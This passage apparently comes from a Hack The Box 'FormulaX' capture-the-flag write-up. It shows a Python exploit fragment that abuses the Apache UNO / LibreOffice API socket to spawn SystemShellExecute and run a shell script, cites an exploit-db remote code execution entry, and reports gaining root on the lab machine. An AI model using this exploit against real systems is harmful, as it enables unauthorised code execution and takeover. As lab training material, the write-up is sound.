"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.hos
t,args.port))
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecut
e")
shell_execute.execute("/tmp/shell.sh", '',1)
Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution
Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution.. remote
exploit for Multiple platform
https://www.exploit-db.com/exploits/46544
Now execute the following While creating listening to the port in our Kali
🚩Root Access
Since we have successfully gained root access all we need to do is get the root flag.
HTB_FormulaX 38